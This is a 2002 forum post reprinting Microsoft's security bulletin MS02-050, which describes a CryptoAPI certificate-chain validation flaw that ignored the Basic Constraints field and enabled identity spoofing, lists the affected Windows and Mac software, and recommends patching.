Steven Posted November 20, 2002 Share Posted November 20, 2002 Certificate Validation Flaw Could Enable Identity Spoofing (Q328145) Originally posted: September 04, 2002 Updated: September 09, 2002 Summary Who should read this bulletin: Customers using Microsoft? Windows?, Office for Mac, Internet Explorer for Mac, or Outlook Express for Mac. Impact of vulnerability: Identity spoofing. Maximum Severity Rating: Critical Recommendation: Administrators should install the patch immediately. Affected Software: Microsoft Windows 98 Microsoft Windows 98 Second Edition Microsoft Windows Me Microsoft Windows NT? 4.0 Microsoft Windows NT 4.0, Terminal Server Edition Microsoft Windows 2000 Microsoft Windows XP Microsoft Office for Mac Microsoft Internet Explorer for Mac Microsoft Outlook Express for Mac Technical description: This patch eliminates a security vulnerability associated with the validation of digital certificate chains. Before installing it, customers should review the Caveats section of this bulletin, which discusses a known side effect of installing the patch. Updated patches are under development to eliminate this side effect. The IETF Profile of the X.509 certificate standard defines several optional fields that can be included in a digital certificate. One of these is the Basic Constraints field, which indicates the maximum allowable length of the certificate?s chain and whether the certificate is a Certificate Authority or an end-entity certificate. However, the APIs within CryptoAPI that construct and validate certificate chains (CertGetCertificateChain(), CertVerifyCertificateChainPolicy(), and WinVerifyTrust()) do not check the Basic Constraints field. The same flaw, unrelated to CryptoAPI, is also present in several Microsoft products for Macintosh. The vulnerability could enable an attacker who had a valid end-entity certificate to issue a subordinate certificate that, although bogus, would nevertheless pass validation. Because CryptoAPI is used by a wide range of applications, this could enable a variety of identity spoofing attacks. These are discussed in detail in the FAQ, but could include: Setting up a web site that poses as a different web site, and "proving" its identity by establishing an SSL session as the legitimate web site. Sending emails signed using a digital certificate that purportedly belongs to a different user. Spoofing certificate-based authentication systems to gain entry as a highly privileged user. Digitally signing malware using an Authenticode certificate that claims to have been issued to a company users might trust. http://www.microsoft.com/technet/treeview/...in/MS02-050.asp Link to comment Share on other sites More sharing options...
Recommended Posts